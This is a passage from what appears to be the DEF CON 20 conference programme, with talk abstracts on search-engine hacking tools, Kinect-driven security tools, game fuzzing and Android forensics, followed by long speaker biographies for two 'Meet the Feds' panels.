All brand new tool additions to the Google Hacking Diggity Project - The Next Generation Search Engine Hacking Arsenal. As always, all tools are free for download and use.
When last we saw our heroes, the Diggity Duo had demonstrated how search
engine hacking could be used to take over someone’s Amazon cloud in less than 30 seconds, build
out an attack profile of the Chinese government’s external networks, and even download all of
an organization’s Internet facing documents and mine them for passwords and secrets. Google and
Bing were forced to hug it out, as their services were seamlessly combined to identify which
of the most popular websites on the Internet were unwittingly being used as malware distribution
platforms against their own end-users.
Now, we've traveled through space and time, my friend, to rock this house again...
True to form, the legendary duo have toiled night and day in the studio (a one room apartment
with no air conditioning) to bring you an entirely new search engine hacking tool arsenal that’s
packed with so much tiger blood and awesome-sauce, that it’s banned on 6 continents. Many of these
new Diggity tools are also fueled by the power of the cloud and provide you with vulnerability data
faster and easier than ever thanks to the convenience of mobile applications. Just a few highlights
of new tools to be unveiled are:
* AlertDiggityDB – For several years, we’ve collected vulnerability details and sensitive information
disclosures from thousands of real-time RSS feeds setup to monitor Google, Bing, SHODAN, and various
other search engines. We consolidated this information into a single database, the AlertDiggityDB,
forming the largest consolidated repository of live vulnerabilities on the Internet. Now it’s available to you.
* Diggity Dashboard – An executive dashboard of all of our vulnerability data collected from search
engines. Customize charts and graphs to create tailored views of the data, giving you the insight
necessary to secure your own systems. This web portal provides users with direct access to the most
current version of the AlertDiggityDB.
* Bing Hacking Database (BHDB) 2.0 – Exploiting recent API changes and undocumented features within
Bing, we’ve been able to completely overcome the previous Bing hacking limitations to create an
entirely new BHDB that will make Bing hacking just as effective as Google hacking (if not more so)
for uncovering vulnerabilities and data leaks on the web. This also will include an entirely
new SharePoint Bing Hacking database, containing attack strings targeting Microsoft SharePoint
deployments via Bing.
* NotInMyBackYardDiggity – Don’t be the last to know if LulzSec or Anonymous post data dumps of your
company’s passwords on PasteBin.com, or if a reckless employee shares an Excel spreadsheet with all
of your customer data on a public website. This tool leverages both Google and Bing, and comes with
pre-built queries that make it easy for users to find sensitive data leaks related to their organizations
that exist on 3rd party sites, such as PasteBin, YouTube, and Twitter. Uncover data leaks in documents
on popular cloud storage sites like Dropbox, Microsoft SkyDrive, and Google Docs. A must have for
organizations that have sensitive data leaks on domains they don’t control or operate.
* PortScanDiggity – How would you like to get Google to do your port scanning for you? Using undocumented
functionality within Google, we’ve been able to turn Google into an extremely effective network port
scanning tool. You can provide domains, hostnames, and even IP address ranges to scan in order to identify
open ports ranging across all 65,535 TCP ports. An additional benefit is that this port scanning is
completely passive – no need to directly communicate with target networks since Google has already
performed the scanning for you.
* CloudDiggity Data Mining Tool Suite – Ever wanted to data mine every single password, email, SSN,
credit card number on the Internet? Our new cloud tools combine Google/Bing hacking and data loss
prevention (DLP) scanning on a massive scale, made possible via the power of cloud computing.
Chuck Norris approved.
* CodeSearchDiggity-Cloud Edition – Google recently shut down Code Search in favor of focusing on Google+,
putting “more wood behind fewer arrows”. I suppose we could have let the matter go, and let CodeSearchDiggity
die, but that would be the mature thing to do. Instead, we are harnessing the power of the cloud to keep the
dream alive – i.e. performing source code security analysis of nearly every single open source code project
in existence, simultaneously.
* BingBinaryMalwareSearch (BBMS) – According to the Verizon 2012 DBIR, malware was used to compromise a
staggering 95% of all records breached for 2011. BBMS allows users to proactively track down and block
sites distributing malware executables on the web. The tool leverages Bing, which indexes executable
files, to find malware based on executable file signatures (e.g. “Time Stamp Date:”, “Size of Code:”,
and “Entry Point:”).
* Diggity IDS – Redesigned intrusion detection system (IDS) for search engine hacking. Will still
leverage the wealth of information provided by the various Diggity Alert RSS feeds, but will also
make more granular data slicing and dicing possible through new and improved client tools. Also
includes the frequently requested SMS/email alerting capabilities, making it easier than ever for
users to keep tabs on their vulnerability exposure via search engines.
So come ready to engage us as we explore these tools and more in this DEMO rich presentation.
You are cordially invited to ride the lightning.
Francis Brown, CISA, CISSP, MCSE, is a Managing Partner
at Stach & Liu, a security consulting firm providing IT security services to the Fortune 500
and global financial institutions as well as U.S. and foreign governments. Before joining
Stach & Liu, Francis served as an IT Security Specialist with the Global Risk Assessment
team of Honeywell International where he performed network and application penetration
testing, product security evaluations, incident response, and risk assessments of critical
infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced
Security Centers and conducted network, application, wireless, and remote access penetration
tests for Fortune 500 clients.
Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, InfoSec
World, ToorCon, and HackCon and has been cited in numerous industry and academic publications.
Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major
in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught
operating system implementation, C programming, and participated in DARPA-funded research
into advanced intrusion prevention system techniques.
Facebook: StachLiu
Rob Ragan is a Senior Security Associate at
Stach & Liu, a specialized security consulting firm serving the Fortune 1000 and
high-tech startups. We protect our clients from the bad guys by breaking in and bending
the rules before the hackers do. From critical infrastructure to credit cards, popular
websites to mobile games, and flight navigation systems to frozen waffle factories, we're there.
Before joining Stach & Liu, Rob served as a Software Engineer with the Application
Security Center team of Hewlett-Packard (formerly SPI Dynamics) where he developed automated
web application security testing tools, performed penetration tests, and researched vulnerability
assessment and identification techniques. Rob has presented his research at leading
conferences such as Black Hat, DEF CON, SummerCon, InfoSec World, HackCon, OuterZ0ne, and
HackerHalted. He has published several white papers and is a contributing author to Hacking Exposed:
Web Applications, 3rd edition.
Twitter: @sweepthatleg
Facebook: StachLiu
Project KinectasploitV2: Kinect Meets 20 Security Tools
Jeff Bryner p0wnlabs/0wner
Last year saw the release of Kinectasploit v1 linking the Kinect with Metasploit in a
3D, first person shooter environment. What if we expanded Kinectasploit to use 20 security tools
in honor of DEF CON's 20th anniversary?!
Jeff Bryner has toiled for over 20 years integrating systems, performing
incident response and forensics and ultimately fixing security issues. He writes for the SANS forensic blog,
has spoken at RSA on SCADA security issues, DEF CON 18 on privacy issues with the
google toolbar, released kinectasploit v1 at DEF CON 19 and runs p0wnlabs.com
just for fun.
Twitter: @p0wnlabs
p0wnlabs.com
Fuzzing Online Games
Elie Bursztein Researcher, Google
Patrick Samy Research Engineer, Stanford University
Fuzzing online games to find interesting bugs requires a unique set of novel techniques.
In a nutshell, the lack of direct access to the game server and having to deal with clients that are far too complex to be
easily emulated force us to rely on injecting fuzzing data into legitimate connections rather than using the standard
replay execution approach. Top that with heavily encrypted and complex network protocols and you start to see why we
had to become creative to succeed :)
In this talk, we will discuss and illustrate the novel techniques we had to develop to be able to fuzz online games,
including how to successfully inject data into a gaming session and how to instrument the game memory to know that our
fuzzing was successful. We will also tell you how to find and reverse the interesting part of the protocol, and how to
decide when to perform the injection.
Elie Bursztein is a researcher at Google's Mountain View, Calif.
headquarters, where he invents ways to fix the Internet's security and privacy problems. Prior to that as a
researcher at Stanford University, Elie designed Wikipedia's CAPTCHA and created Talisman, a Chrome browser
extension that enhances security. He is also the inventor of the award-winning game hacking tool Kartograph
presented at DEF CON 18 and Security and Privacy 2011.
Twitter: @elie
http://elie.im
Patrick Samy is a research engineer at Stanford University where he focuses
on hardware and system security. He is the lead developer of the Kartograph network and scripting engine. He also
developed the Kartograph real-time visualization engine.
The Open Cyber Challenge Platform
Linda C. Butler
Everyone from MIT to the DoD has agreed that teaching cyber security using
cyber challenges, where groups of students attack or defend a live network, is an
incredibly effective educational tactic. Unfortunately, current cyber challenge tools suffer from
being very hard to configure, and/or very expensive, and/or limited to certain audiences (e.g.
the military), which makes them inaccessible to high schools, colleges, and smaller organizations.
The Open Cyber Challenge Platform aims to help fix this by providing a free, open-source, cyber
challenge software platform that is reasonable in terms of cost of required hardware and required
technical installation/maintenance expertise, as well as easily extensible to allow the vast open
source community to provide additional modules that reflect new challenges and scenarios. If you're
interested in the future of cyber-security education, or simply just want to learn about a new
potential training tool, come check out the OCCP.
Linda C. Butler is a computer science student currently
interning at the University of Rhode Island's Digital Forensics and Cyber Security Program. Past activities
include an internship in the NASA Engineering department at Kennedy Space Center, a backpacking trip through
New Zealand, and performing at a renaissance faire. She's an OWASP member and past DEFCON Attendee, and finds
the interaction between security, privacy, and society an endlessly fascinating area of study.
Into the Droid: Gaining Access to Android User Data
Thomas Cannon Director of Research and Development, viaForensics
This talk details a selection of techniques for getting the data out of an Android device in order to
perform forensic analysis. It covers cracking lockscreen passwords, creating custom forensic ramdisks, bypassing bootloader
protections and stealth real-time data acquisition. We’ll even cover some crazy techniques - they may get you that crucial
data when nothing else will work, or they may destroy the evidence!
Forensic practitioners are well acquainted with push-button forensics software. They are an essential tool to keep on top of
high case loads – plug in the device and it pulls out the data. Gaining access to that data is a constant challenge against
sophisticated protection being built into modern smartphones. Combined with the diversity of firmware and hardware on the
Android platform it is not uncommon to require some manual methods and advanced tools to get the data you need.
This talk will reveal some of the techniques forensic software uses behind the scenes, and will give some insight
into what methods and processes blackhats and law enforcement have at their disposal to get at your data. Free and
Open Source tools will be released along with this talk to help you experiment with the techniques discussed.
Note that this talk does not discuss Android analysis basics such as how to use ADB or what the SDK is - it is assumed
you know these or can easily look them up afterwards.
Thomas Cannon is the Director of Research and Development for
viaForensics, a Chicago based digital forensics and security company. Thomas spends the majority of his
time researching new mobile security, malware and forensics techniques and getting them into the hands of
customers for commercial, research or military application. He conducts penetration testing and code
analysis of mobile applications for clients in industries such as banking/finance and retail.
Thomas is known for his research on Android having published advisories for new vulnerabilities and demonstrated
attacks on the platform as well as providing some early guides on reverse engineering Android applications. Thomas
has spoken at international conferences and presented to law enforcement on the topic of mobile forensics. Thomas
has had a number of articles published in industry magazines and also been interviewed on national news programmes
regarding vulnerabilities in payment systems and mobile technology.
Twitter: @thomas_cannon
https://viaforensics.com
http://thomascannon.net
Panel: Meet the Feds 1 - Law Enforcement
Panelists
Jim Christy Moderator, DC3
Leon Carroll Ex-NCIS
Andy Fried Ex-IRS
Jon Iadonisi Ex-Navy Seal
Rich Marshall NSA
David McCallum TV-NCIS
Justin Wykes NW3C
Did you ever wonder if the Feds were telling you the truth
when you asked a question? Join current and former federal agents from numerous agencies
to discuss cyber investigations and answer your burning questions. Enjoy the
opportunity to grill ‘em and get down to the bottom of things!
Agencies that will have representatives include: Defense Cyber Crime Center (DC3),
National White Collar Crime Center (NW3C), US Department of Treasury, Internal
Revenue Service (IRS), and the US Navy SEALs. This year, the “Meet the Feds” panel
has gone Hollywood with special guests - Mr. David McCallum and Mr. Leon Carroll
from CBS’s NCIS!
Each of the agency reps will make an opening statement regarding their agency's
role, and then open it up to the audience for questions.
Jim Christy is a retired special agent who has
specialized in cyber crime investigations and digital forensics for over 26 years with the Air Force
Office of Special Investigation, and has over 40 years of federal service. Jim returned to the federal government
first as an IPA and now as an HQE, and is the Director of Futures Exploration (FX) for the Department of
Defense Cyber Crime Center (DC3). FX, the DC3 innovation incubator, is responsible for outreach/marketing
and strategic relationships with other government organizations, the private sector, and academia for DC3. He
was profiled in Wired Magazine in January 2007.
Jim consulted with David Marconi (writer of Enemy of the State, Mission Impossible 2 & Live Free or Die Hard) and
contributed technical advice on critical infrastructure attacks used in the movie Live Free or Die Hard.
In May 2011, the Air Force graduated the first NCO’s for a new AF career field, Cyber Defense Operations at Keesler
AFB, MS. The staff of the course honored Jim by presenting the top graduate of the class with the “Jim Christy Award”.
In 2006, Christy created the DC3 Digital Forensics Challenge, an international competition that in 2011 had 1,800
participants spanning all 50 states and 53 countries. The exercises are designed to develop, hone, and engage
participants in the fields of cyber investigation, digital forensics, and cyber security. It is one of the first
venues to employ crowd sourcing in “real world” mission focused solution development.
In Oct 2003, the Association of Information Technology Professionals named Jim the 2003 Distinguished Information
Science Award winner for his outstanding contribution through distinguished services in the field of information
management. Previous recipients of this prestigious award include Admiral Grace Hopper, Gene Amdahl, H. Ross Perot,
General Emmett Paige, Bill Gates, Lawrence Ellison, David Packard and Mitch Kapor.
From 17 Sep 01 – 1 Nov 03, Jim was the Deputy Director/Director of Operations, Defense Computer Forensics Lab, DC3.
As the Dir of Ops for the DCFL he managed four sections with over 40 computer forensic examiners that supported Major
Crimes & Safety, Counterintelligence and Counterterrorism, as well as Intrusions and Information Assurance cases for
the Department of Defense.
Leon Carroll grew up in Chicago and graduated from North Dakota State University
(where he played on college Division II National Championship football teams). He served 6 years
in the Marines and then continued in the Marine Reserves in Long Beach (under the command of
PV Sunset member Lt Col Jacques Naviaux).
Carroll was a member of the U.S. Marine Corps when he joined NCIS in 1980. Leon worked at a halfway house for pre-release
felons in Fargo, North Dakota, and then became a special agent with the Naval Investigative Service, later known as the
Naval Criminal Investigative Service (NCIS), serving in several places including Panama and aboard the USS Ranger.
He retired two decades later, but returned after 9/11, serving another year and a half to help with the agency's expanded
role in counter-terrorism. After his second retirement, he and his wife moved to the Los Angeles area.
As a retired NCIS agent with over 20 years of experience, Mr. Carroll received an unexpected opportunity to work as a
technical adviser to the NCIS TV program in Los Angeles. He was recruited in 2003 by the producers who said they
needed someone who could provide the show with the “spit-polish shine of authenticity.”
Working on both NCIS and NCIS Los Angeles, Mr. Carroll is a technical adviser to the script writers,
actors and director, and has also written scripts for a few episodes himself. He works under the leadership
of Mark Hyman of football fame. They do 24 episodes per season.
Andy Fried is a Senior Consultant with Cutter Consortium's Business Technology Strategies and
Government & Public Sector practices. His unique skill set has earned him a worldwide reputation; his background
includes working as a uniformed police officer, a computer programmer and security analyst, and a Senior Special Agent
with the US Department of the Treasury, a post he retired from after a 20-year career. Mr. Fried's extensive knowledge
allows him to identify large data sources that are seemingly unrelated and combine them to produce findings that would
not be otherwise identified. His passion and tenacity for identifying and stopping Internet criminal activity has earned
him the respect of leading industry experts. During his last two years at the US Treasury, Mr. Fried was credited with
identifying and mitigating over 3,000 fraudulent online schemes. He currently works as a security researcher for a
nonprofit organization involved in identifying organized criminal enterprises responsible for fraudulent schemes,
denial-of-service attacks, malware propagation, and large-scale botnets. Mr. Fried's work routinely involves data
mining and analysis of data sets that contain hundreds of millions of records.
Early in his career, Mr. Fried was a programmer for Bionetics, a life sciences medical research group at the Kennedy
Space Center, where he became a technology evangelist, identifying work processes that could be automated, conducting
R&D for new computer hardware and software programs, and assisting biostatisticians in aggregating and processing
the voluminous research data generated by data acquisition systems. At Bionetics, Mr. Fried was tasked with providing
technical support to NASA's Internal Security Office, including one high-profile case involving the arrest and
investigation of a kidnapper/rapist. At NASA's suggestion, he moved from Bionetics into a computer security analyst
position within the newly formed Lockheed Space Operations Corporation (LSOC). He soon became involved in processing
and analyzing digital data related to the kidnapping/rape investigation and developed a suite of forensic software
programs. His software became the first set of programs designed specifically for use by law enforcement and was
adopted by the FBI, IRS, and Air Force Office of Special Investigations. Soon after, the IRS recruited Mr. Fried
for a Special Agent position, citing a need to develop the capability to detect, investigate, and prosecute
computer-related crimes. He went on to help establish the Criminal Investigation Division's Computer Investigative
Specialist (CIS) program, a similar program for IRS Inspection, the System Intrusion and Network Attack Response
Team (SINART), and the Computer Security Incident Response Capability (CSIRC).
More recently, Mr. Fried developed databases and innovative techniques to proactively detect online schemes
targeting the IRS. He identified various sources of intelligence and information, developed strategic alliances
with private organizations, and designed automated systems to obtain and analyze large data sets for the purpose
of identifying and mitigating online schemes. Mr. Fried also designed, developed, and implemented his agency's
network-based digital video surveillance system. He additionally developed strategic alliances with a large number
of domain registrars, ISPs, government-sponsored CERTs, and private organizations involved in various forms of network
security for the purpose of increasing the ability to mitigate fraudulent behavior as quickly as possible. In 2008,
Mr. Fried presented a proposal to IRS management to form a new division whose sole mission was to monitor, detect,
and mitigate online fraudulent schemes targeting the IRS and US taxpayers. The proposal was adopted and led to the
formation of IRS Online Fraud Detection and Prevention (OFDP).
Mr. Fried is on the executive board of directors of the Fraternal Order of Police in Washington, DC,
and is affiliated with several security organizations that cannot be named. He is a frequent presenter
at Black Hat and DEF CON. Mr. Fried has a BS degree in criminology.
Jon Iadonisi is the founder of White Canvas Group – a company that specializes
in cultivating alternative and disruptive strategies. His depth of experience, diversified expertise,
and unique operational background has provided a perspective that has enabled him to contribute to
solving national security problems. He has spent the past fifteen years using innovative computing
technologies coupled with cutting edge scholarship to solve complex problems, some of which later
became implemented as new strategies and capabilities for the U.S. Government. He is regularly sought
by the Department of Defense, various Intelligence agencies, and members of the US Congress to provide
expert opinion and briefings on information age unconventional warfare. Prior to joining the private
sector, Jon served as a Navy SEAL, where he designed, planned and led various combat operations that
integrated innovative technologies and tactics into the operating environment, ultimately creating
new capabilities for the Special Operations Community and Central Intelligence Agency. He is a
combat-wounded and decorated veteran who earned a B.S. in Computer Science from the US Naval
Academy, and an M.S. in Homeland Security from San Diego State University. He is a member of the
Council on Foreign Relations and guest lectures at San Diego State University and Georgetown
Law School. He is an academic and athletic All-American who participated in the 2000 Olympic
Rifle team trials. He enjoys fine wine, good books, music, and outdoors activities.
Rich Marshall is the Founder and President of X-SES Consultants, LLC, the former
Vice President of Cyber Programs at Triton FSI and is a nationally and internationally recognized
thought leader on cyber related issues. He provides an impressive professional network and is known
for facilitating the establishment of programs and contracts. He has extensive leadership experience
in formulating growth strategies, integrating policy, culture and training with technology issues,
building relationships and delivering lasting results. He is also a strategic thinker who knows how
to lead and very importantly, knows where to lead.
He previously was a member of the Senior Cryptologic Executive Service (SCES) and the Defense Intelligence
Senior Executive Service (DISES). Prior to joining Triton FSI, he was the Director of Global Cyber Security
Management, National Cyber Security Division, Department of Homeland Security (DHS) by special arrangement
between the Director, National Security Agency (DIRNSA) and the Secretary of DHS. Within DHS he directed
National Cyber Security Education Strategy; and the Software Assurance; Research and Standards Integration;
and Supply Chain Risk Management programs.
Mr. Marshall was previously the Senior Information Assurance (IA) Representative, Office of Legislative
Affairs at the National Security Agency (NSA) where he served as the Agency's point of contact for all NSA
Information Security (INFOSEC) matters concerning Congress. He devised the IA legislative strategy, helped
shape the passage of the revised Foreign Intelligence Surveillance Act and was the Comprehensive National
Cyber Security Initiative (CNCI).
In 2001, Mr. Marshall was selected by the Cyber Advisor to the President to serve as the Principal Deputy Director,
Critical Infrastructure Assurance Office (CIAO), where he led a team of 40 dedicated professionals in developing,
coordinating and implementing the Administration's National Security for Critical Infrastructure Protection initiative
and the National Cyber Security Strategy to address potential threats to the nation's critical infrastructures.
From 1994 to 2001, Mr. Marshall served with distinction as the Associate General Counsel for Information Systems
Security/Information Assurance, Office of the General Counsel, National Security Agency. In that capacity, Mr.
Marshall provided advice and counsel on national security telecommunications and technology transfer policies
and programs, national security telecommunications technical security programs, the National Information
Assurance Partnership, the Common Criteria Mutual Recognition Arrangement, legislative initiatives and
international law. Mr. Marshall was the legal architect for the Joint Chiefs of Staff directed exercise "Eligible
Receiver 97" that spotlighted many of the cyber-vulnerabilities of our nation's critical infrastructures and helped
bring focus on this issue at the national leadership level.
Mr. Marshall graduated from The Citadel with a B.A. in Political Science; Creighton University School of Law with
a J.D. in Jurisprudence; Georgetown School of Law with an LL.M. in International and Comparative Law; was a Fellow
at the National Security Law Institute, University of Virginia School of Law in National Security Law; attended
the Harvard School of Law Summer Program for Lawyers; the Georgetown University Government Affairs Institute on
Advanced Legislative Strategies and participated in the Information Society Project at Yale Law School and in the
Privacy, Security and Technology in the 21st Century program at Georgetown University School of Law.
David McCallum:
Born David Keith McCallum, Jr. in Glasgow, Scotland on Sept. 19, 1933, he was the son of David McCallum, Sr.,
the famed principal violinist for numerous orchestras in the United Kingdom, including the Royal Philharmonic
Orchestra, and cellist Dorothy Dorman. After studying at the Royal Academy of Dramatic Arts, he made his debut
in a 1946 BBC Radio production of "Whom the Gods Love, Die Young." Bit and supporting roles in British features
and on television soon followed, often as troubled youth, as befitting his brooding intensity. Among his more
notable turns during this period was in 1958's "Violent Playground," where his psychotic gang member is spurred
by poverty and rock and roll to take a classroom of school children hostage.
McCallum's American film debut came as the mother-fixated Carl von Schlosser in John Huston's "Freud" (1962),
with Montgomery Clift as the pioneering analyst. The following year, he played Royal Navy Officer Ashley-Pitt,
who devised the method of dispersing the dirt from tunnels dug under a POW camp in "The Great Escape" (1963).
An early American television appearance on "The Outer Limits" (CBS, 1963-65) became one of his most enduring,
thanks to the eye-popping makeup applied to McCallum. His character, a bitter Welsh miner, agreed to take part
in an evolutionary experiment, which turned him into a hyper-intelligent mutant with a massive domed cranium.
The image was memorable enough to make McCallum a go-to for numerous science fiction efforts in the ensuing decades.
In 1964, McCallum was cast as Illya Kuryakin, a minor character on the spy series "The Man from U.N.C.L.E."
Despite having only two lines, the producers saw that McCallum and star Robert Vaughn had considerable chemistry
together, and boosted the character to co-star status. The move changed McCallum's career forever. Kuryakin's cool
demeanor, physical proficiency with any weapon, and passion for art, music and science - not to mention his wealth
of blonde hair - made him an immediate favorite among female viewers, whose fan mail to the actor was the most
ever received in the history of MGM, which produced the show. For the series' three years on the air, McCallum
was at the apex of television stardom, and netted two Emmy nominations and a Golden Globe nod, as well as major
roles in several films. He was the tormented Judas in George Stevens' epic Biblical drama "The Greatest Story
Ever Told" (1965), and took the lead in a number of minor features, including 1968's "Sol Madrid" and "Mosquito
Squadron" (1969), many of which traded on McCallum's popularity in "U.N.C.L.E." by casting him in action-oriented
roles. During this period, McCallum also orchestrated and conducted a trio of lush, sonically adventurous records
that put unique spins on some of the period's more popular songs.
In the 1970s, McCallum was a fixture on television in both America and England. In the
States, he was a staple of science fiction and supernaturally-themed TV features, including "Hauser's Memory"
(NBC, 1970), as a scientist who injected himself with a dying colleague's brain fluid to preserve defense secrets
from foreign agents, while "She Waits" (CBS, 1972) cast him as the husband to a possessed Patty Duke. He also
briefly returned to series work with "The Invisible Man" (NBC, 1975-76) as a scientist who used his invisibility
formula to aid a government agency against evildoers. His work in England hewed more towards dramatic fare:
in "Colditz" (BBC, 1972-74), he was an aggressive RAF officer who put aside his anger towards the Nazis to help
organize an escape from a notorious German war prison, while in "Sapphire & Steel" (ITV, 1979-1982), he and Joanna
Lumley played extraterrestrial operatives who investigated strange incidents involving the time-space continuum.
In 1983, he reunited with Robert Vaughn for "The Return of the Man from U.N.C.L.E." (CBS), which saw Illya retired
from espionage to design women's clothing in New York. The escape of a top enemy spy brings both U.N.C.L.E. men
back into action, albeit with other, younger agents. The TV-movie was intended as the pilot for a new version
of the series, but the show was never greenlit.
After logging time on countless, unmemorable series like "Team Knight Rider" (syndicated, 1997-98) and "The
Education of Max Bickford" (CBS, 2001-02), McCallum found his next hit with "NCIS," a police procedural drama
about Navy investigators. McCallum played Chief Medical Examiner Donald "Ducky" Mallard, an eccentric but highly
efficient investigator with a knack for psychological profiling. A close confidant to Mark Harmon's Jethro Gibbs,
he served as father confessor and paternal figure for the show's offbeat cast of characters. The show's slow-building
popularity brought McCallum back to a television audience made up in part of the children of viewers who sent him fan
letters back in the "U.N.C.L.E." days, granting him a rare burst of second stardom.
Justin Wykes joined the National White Collar Crime Center in December 2006 as a Computer
Crime Specialist. He is currently responsible for the development and updating of the "Basic Cell Phone
Investigations" course as well as instructing multiple basic and advanced level courses.
He has ten years' experience building, fixing and repairing computers, and earned his A+ certification in
September of 2006. After earning a Bachelor of Science degree from Grand Valley State University in
Criminal Justice, with an emphasis in Law Enforcement, Mr. Wykes spent five years as a Special Agent
for US Army Counterintelligence. The last two of those years were spent as a computer forensic examiner
for the Cyber Counterintelligence Activity. As a Special Agent for CCA, Mr. Wykes conducted
multi-agency investigations in security compromises, espionage, and terrorism.
Meet the Feds 2 - Policy
Panelists:
Jim Christy Moderator, DC3
Rich Marshall NSA
Rod Beckstrom Ex-DHS
Jerry Dixon Ex-DHS
Mischel Kwon Ex-US-CERT
Riley Repko VT
Dr. Linton Wells NDU
Mark Weatherford DHS
Marcus Sachs Ex-WHS
Robert E. Joyce NSA
Did you ever wonder if the Feds were telling you the truth
when you asked a question? Join current and former federal agents from numerous
agencies to discuss cyber policy and answer your burning questions. Enjoy the
opportunity to grill ‘em and get down to the bottom of things!
Agencies that will have representatives include: Defense Cyber Crime Center (DC3),
Department of Homeland Security (DHS), United States Computer Emergency Readiness
Team (US CERT), Office of the Secretary of Defense Networks and Information
Integration (OSD/NII), National Security Agency (NSA), National Defense
University (NDU), and Virginia Tech.
Each of the agency reps will make an opening statement regarding their
agency's role, and then open it up to the audience for questions.
Jim Christy is a retired special agent who has
specialized in cyber crime investigations and digital forensics for over 26 years with the Air Force
Office of Special Investigations and has over 40 years of federal service. Jim returned to the federal government
first as an IPA and now as an HQE, and is the Director of Futures Exploration (FX) for the Department of
Defense Cyber Crime Center (DC3). FX, the DC3 innovation incubator, is responsible for outreach/marketing
and strategic relationships with other government organizations, the private sector, and academia for DC3. He
was profiled in Wired Magazine in January 2007.
Jim consulted with David Marconi (writer of Enemy of the State, Mission Impossible 2 & Live Free or Die Hard) and
contributed technical advice on critical infrastructure attacks used in the movie Live Free or Die Hard.
In May 2011, the Air Force graduated the first NCOs for a new AF career field, Cyber Defense Operations, at Keesler
AFB, MS. The staff of the course honored Jim by presenting the top graduate of the class with the "Jim Christy Award".
In 2006, Christy created the DC3 Digital Forensics Challenge, an international competition that in 2011 had 1,800
participants spanning all 50 states and 53 countries. The exercises are designed to develop, hone, and engage
participants in the fields of cyber investigation, digital forensics, and cyber security. It is one of the first
venues to employ crowd sourcing in “real world” mission focused solution development.
In Oct 2003, the Association of Information Technology Professionals named Jim the 2003 Distinguished Information
Science Award winner for his outstanding contribution through distinguished services in the field of information
management. Previous recipients of this prestigious award include Admiral Grace Hopper, Gene Amdahl, H. Ross Perot,
General Emmett Paige, Bill Gates, Lawrence Ellison, David Packard and Mitch Kapor.
From 17 Sep 01 – 1 Nov 03, Jim was the Deputy Director/Director of Operations, Defense Computer Forensics Lab, DC3.
As the Dir of Ops for the DCFL he managed four sections with over 40 computer forensic examiners that supported Major
Crimes & Safety, Counterintelligence and Counterterrorism, as well as Intrusions and Information Assurance cases for
the Department of Defense.
Rod Beckstrom is a highly successful entrepreneur, founder and CEO of a publicly-traded company, a
best-selling author, avowed environmentalist, public diplomacy leader and, most recently, the head of a top-level
federal government agency entrusted with protecting the nation’s communication networks against cyber attack.
Throughout 2008, Rod served as the Director of the National Cybersecurity Center (NCSC) at the U.S. Department of
Homeland Security, where he reported to the Secretary of DHS, and was charged with cooperating directly with the
Attorney General, National Security Council, Secretary of Defense, and the Director of National Intelligence (DNI).
Prior to joining DHS, he served on the DNI’s Senior Advisory Group. Rod is unique in having experienced the inner
workings of two, highly-charged, often competing, federal security agencies created in the wake of the September
11th attacks, an event that he says, “changed my life.”
Rod is widely regarded as a pre-eminent thinker and speaker on issues of cybersecurity and related global issues,
as well as on organizational strategy and leadership. He is also an expert on how carbon markets and “green” issues
affect business. While Director of the NCSC, Rod developed an effective working group of leaders from the nation's
top six cybersecurity centers across the civilian, military and intelligence communities. His work led to his
development of a new economic theory that provides an explicit model for valuing any network, answering a
decades-old problem in economics.
Rod co-authored four books including The Starfish and the Spider: The Unstoppable Power of Leaderless Organizations,
a best-selling model for analyzing organizations, leadership styles, and competitive strategy. The Starfish and the
Spider has been translated into 16 foreign editions and is broadly quoted.
At age 24, Rod started his first company in a garage apartment and, subsequently, grew it into a global enterprise
with offices in New York, London, Tokyo, Geneva, Sydney, Palo Alto, Los Angeles, and Hong Kong. CATS Software Inc.
went public and was later sold. Nobel Laureates Myron Scholes and William F. Sharpe served on the company's boards of
directors and advisors. While at CATS Rod helped advance the financial theory of "value at risk," now used globally
for all key banking risk management. Rod co-edited the first book to introduce "value at risk." Rod also
co-founded Mergent Systems, a pioneer in inferential database engines, which Commerce One later acquired for $200
million. He has co-launched other collaborations, software, and internet service businesses, as well. From 1999 to
2001, he served as Chairman of Privada, Inc, a leader in technology enabling private, anonymous, and secure credit
card transactions over the internet.
In 2003, Rod co-founded a global peace network of CEOs which initiated Track II diplomatic efforts between India
and Pakistan. The group’s symbolic actions opened the borders to people and trade, and contributed to ending the
most recent Indo-Pak conflict. It's one of several non-profit groups and initiatives Rod has started. He now serves
on the boards of the Environmental Defense Fund, which Fortune Magazine ranked as one of the seven most powerful
boards in the world and Jamii Bora Trust an innovative micro-lending group in Africa with more than 200,000 members.
He is a graduate of Stanford University with an MBA and a BA with Honors and Distinction. He served as Chairman
of the Council of Presidents of the combined Stanford student body (ASSU) and was a Fulbright Scholar at the
University of St. Gallen in Switzerland.
Jerry Dixon currently serves as Director of Analysis for Team Cymru and
was formerly the Director of the National Cyber Security Division (NCSD) & US-CERT of the Department of
Homeland Security. He continues to advise partners on national cyber-security threats,
aids organizations in preparing for cyber-attacks, and assists with the development of
cyber-security policies for organizations.
Mischel Kwon is an IT executive with more than 29 years of experience ranging from
application design and development, network architecture and deployment, Information
Assurance policy, audit and management, technical defensive security, large wireless
system security, to building organizational and national level Computer
Emergency/Incident Response/Readiness Teams.
Ms. Kwon currently serves as the President of Mischel Kwon Associates, a security
consulting firm specializing in Technical Defensive Security, Security Operations and
Information Assurance.
Most recently, as the Vice President of Public Sector Security for RSA Security, Ms.
Kwon was responsible for leading RSA in assisting the public sector security solutions,
strategies, technologies and policy.
Ms. Kwon was named the Director for the United States Computer Emergency
Readiness Team (US-CERT) in June 2008 where she spearheaded the organization
responsible for analyzing and reducing cyber threats and vulnerabilities in federal
networks, disseminating cyber threat warning information and coordinating national
incident response activities.
Kwon brings a unique blend of hands-on experience, academic research and training,
and a seasoned understanding of how to build operational organizations from inception.
Among her successes at the United States Department of Justice (DOJ), where she
was Deputy Director for IT Security Staff, she built and deployed the Justice Security
Operations Center (JSOC) to monitor and defend the DOJ network against cyber
threats.
Ms. Kwon holds a Master of Science in Computer Science and a graduate certificate in
Computer Security and Information Assurance. In addition, she serves as an adjunct
professor at George Washington University in Washington, DC, where Ms. Kwon also
runs the GW Cyber Defense Lab.
Riley Repko remains committed to building the 'knowledge-bridge' between the
innovator (the solver) and the requirement (the seeker). He has a long history of working with
innovative small and medium sized companies and entrepreneurs leveraging his know-how to drive
business. A constant and responsive connector, he is most comfortable strategizing with key
